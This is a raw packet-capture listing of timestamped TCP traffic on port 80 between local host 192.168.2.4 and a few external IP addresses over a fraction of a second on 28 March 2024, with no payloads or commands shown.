Mar 28, 2024 09:15:00.233750105 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233757973 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.233812094 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233820915 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233844995 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.233896017 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233908892 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233911037 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233920097 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.233925104 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233932972 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233944893 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233966112 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233984947 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.233984947 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.233998060 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234034061 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.234040976 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234059095 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234065056 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.234096050 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234108925 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.234108925 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.234128952 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.234137058 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234165907 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234181881 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234224081 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234270096 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.234266996 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234277964 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.234287977 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.234301090 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.234323025 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.234323025 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.234344959 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234366894 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234378099 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234409094 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234428883 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.234446049 CET	80	49765	130.164.189.20	192.168.2.4
Mar 28, 2024 09:15:00.234452963 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234503984 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.234508038 CET	49765	80	192.168.2.4	130.164.189.20
Mar 28, 2024 09:15:00.234512091 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234519005 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.234540939 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234561920 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.234565973 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.234575033 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234596968 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234607935 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234618902 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.234637022 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234643936 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234663963 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.234704971 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234711885 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234725952 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234731913 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.234745026 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234774113 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234776020 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.234776020 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.234790087 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234819889 CET	80	49765	130.164.189.20	192.168.2.4
Mar 28, 2024 09:15:00.234839916 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.234863043 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234868050 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.234872103 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234874010 CET	49765	80	192.168.2.4	130.164.189.20
Mar 28, 2024 09:15:00.234888077 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234918118 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234937906 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.234965086 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.234972000 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.234983921 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.234992981 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.235013008 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.235013008 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.235042095 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235049009 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235059977 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.235078096 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235080957 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.235085964 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235110998 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235117912 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235140085 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235161066 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.235172987 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235217094 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235263109 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235270023 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235281944 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235291958 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.235323906 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235340118 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235361099 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.235385895 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235394001 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235414028 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.235446930 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235455036 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235475063 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.235502005 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235510111 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235528946 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.235542059 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235562086 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235582113 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.235584974 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235613108 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235634089 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.235683918 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235698938 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235701084 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235709906 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.235738039 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235745907 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.235755920 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.235769033 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235780001 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.235780001 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.235816002 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235868931 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.235877037 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235888958 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235897064 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.235914946 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.235914946 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.235940933 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235949039 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235960960 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.235969067 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.235980988 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236001968 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236006021 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.236047983 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236083984 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236112118 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.236124992 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236144066 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236181021 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.236219883 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.236233950 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.236242056 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236254930 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236274958 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236288071 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.236288071 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.236320972 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236401081 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236432076 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236447096 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.236500978 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236510992 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.236565113 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236619949 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.236627102 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236661911 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236687899 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.236687899 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.236712933 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236747980 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236772060 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.236824036 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236850023 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.236881971 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236898899 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.236913919 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236947060 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236969948 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.236984968 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236994028 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.236999989 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237006903 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237027884 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237052917 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237061024 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237076998 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237087965 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237113953 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237118959 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237164021 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237179995 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237224102 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237231016 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237251043 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237252951 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237265110 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237272024 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237282038 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237312078 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237338066 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237363100 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237371922 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237386942 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237390995 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237416029 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237422943 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237435102 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237442017 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237442017 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237482071 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237498045 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237504959 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237529993 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237541914 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237560987 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237564087 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237593889 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237601042 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237608910 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237633944 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237649918 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237663984 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237672091 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237732887 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237740993 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237760067 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237773895 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237797022 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237806082 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237808943 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.237828970 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.237852097 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237852097 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.237865925 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237874031 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237885952 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.237920046 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237934113 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.237935066 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237945080 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.237967968 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238007069 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238013983 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238013983 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238034010 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238055944 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238079071 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238087893 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238100052 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238105059 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238115072 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238135099 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.238153934 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238161087 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.238181114 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238181114 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.238198996 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238217115 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.238238096 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238245010 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238256931 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238265038 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238272905 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238296032 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238332033 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238367081 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238437891 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238440990 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238451958 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238471031 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238476038 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238490105 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238527060 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238527060 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238570929 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238579035 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238584995 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238591909 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238599062 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238631010 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238637924 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238640070 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238656044 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238703012 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238718987 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238727093 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238735914 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238754988 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238775969 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238795996 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238821030 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238830090 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238832951 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238847971 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238871098 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238873959 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238876104 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238909006 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.238934994 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238943100 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238955021 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.238964081 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.239005089 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.239005089 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.239022017 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.239042044 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.239074945 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.239078999 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.239121914 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.239137888 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.239171028 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.239232063 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.239245892 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.239301920 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.239301920 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.239314079 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.239320993 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.239362955 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.239454031 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.239470005 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.239491940 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.239552975 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.239584923 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.239605904 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.239702940 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.239713907 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.239737034 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.239767075 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.239773989 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.239809990 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.239814043 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.239850998 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.239948988 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.239989042 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.240035057 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240042925 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.240046024 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.240076065 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.240091085 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.240119934 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.240206957 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240269899 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.240514994 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240531921 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240582943 CET	80	49734	195.20.16.46	192.168.2.4
